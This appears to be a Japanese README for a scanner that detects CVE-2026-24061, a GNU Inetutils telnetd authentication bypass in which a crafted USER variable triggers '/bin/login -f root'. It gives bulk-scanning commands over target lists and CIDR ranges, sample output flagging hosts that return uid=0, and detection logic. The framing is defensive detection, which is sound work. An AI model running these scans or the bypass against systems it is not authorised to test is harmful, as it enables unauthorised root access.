
GNU Inetutils telnetリモート認証バイパス脆弱性(CVE-2026-24061)。この脆弱性は、GNU Inetutils telnetdコンポーネントにおける環境変数の処理不備に起因します。攻撃者はこの脆弱性を悪用し、悪意のあるUSER環境変数を細工して影響を受けるtelnetサービスに送信することで、認証バイパスメカニズムを発動させ、パスワードなしで直接root権限を取得することが可能になります。
これはGNU Inetutils Telnetdの認証バイパス脆弱性 (CVE-2026-24061) を検出するための高度な検出ツールです。この脆弱性のCVSSスコアは9.8で、攻撃者は環境変数インジェクションを通じて認証なしでroot権限を取得できます。
# Windowsシステムの色サポート
pip install colorama
python3 CVE-2026-24061.py 192.168.1.1
# ターゲットファイルの作成
echo "192.168.1.1" > targets.txt
echo "192.168.1.2" >> targets.txt
echo "192.168.1.3" >> targets.txt
# 一括検出の実行
python3 CVE-2026-24061.py -f targets.txt
# ポートとスレッド数の指定
python3 CVE-2026-24061.py -f targets.txt -p 23 -t 50
# 詳細モードで結果を保存
python3 CVE-2026-24061.py -f targets.txt -o results.txt -v
# カスタムタイムアウト時間
python3 CVE-2026-24061.py -f targets.txt -T 10
| ステータス | 識別子 | 色 | 説明 |
|---|---|---|---|
| 脆弱性確認 | ✓ | 🔴 赤 | uid=0とgid=0の両方を検出 |
| 高度に疑わしい | ⚠ | 🟡 黄 | uid=0とrootユーザーを検出 |
| 要確認 | ? | 🔵 シアン | uid=0のみ検出、手動検証が必要 |
| 安全 | ✗ | 🟢 緑 | 脆弱性の特徴を検出せず |
| 接続失敗 | ✗ | ⚪ グレー | ネットワーク接続の問題 |
[✓ 脆弱性確認] [14:30:25] 192.168.1.1:23 └─ 脆弱性確認 | uid=0/gid=0 | バナー: Ubuntu 20.04
[⚠ 高度に疑わしい] [14:30:26] 192.168.1.2:23 └─ 高度に疑わしい | uid=0 + root | バナー: Debian 12
[? 要確認] [14:30:27] 192.168.1.3:23 └─ uid=0を検出したが他の確認条件が不足
| パラメータ | 省略形 | デフォルト値 | 説明 |
|---|---|---|---|
--file | -f | - | ターゲットファイルパス |
--port | -p | 23 | ターゲットポート |
--threads | -t | 50 | 並行スレッド数 |
--timeout | -T | 8 | 単一ターゲットのタイムアウト時間(秒) |
--output | -o | - | 結果出力ファイル |
--verbose | -v | False | 詳細出力モード |
--user | -u | root | 認証ユーザー名 |
ターゲットファイルは以下の形式をサポートします:192.168.1.1 192.168.1.2:2323 # ポート指定 192.168.1.0/24 # CIDR形式 10.0.0.1-10.0.0.10 # IP範囲
この脆弱性はGNU Inetutils Telnetdの環境変数処理の欠陥を利用します:
/bin/login -f rootコマンドを実行# 多重検出条件
uid_0_detected = "uid=0" in response_text
gid_0_detected = "gid=0" in response_text
root_detected = "root" in response_text
# 脆弱性確認ロジック
if uid_0_detected and gid_0_detected:
return "脆弱性確認"
elif uid_0_detected and root_detected:
return "高度に疑わしい"
elif uid_0_detected:
return "要確認"
·


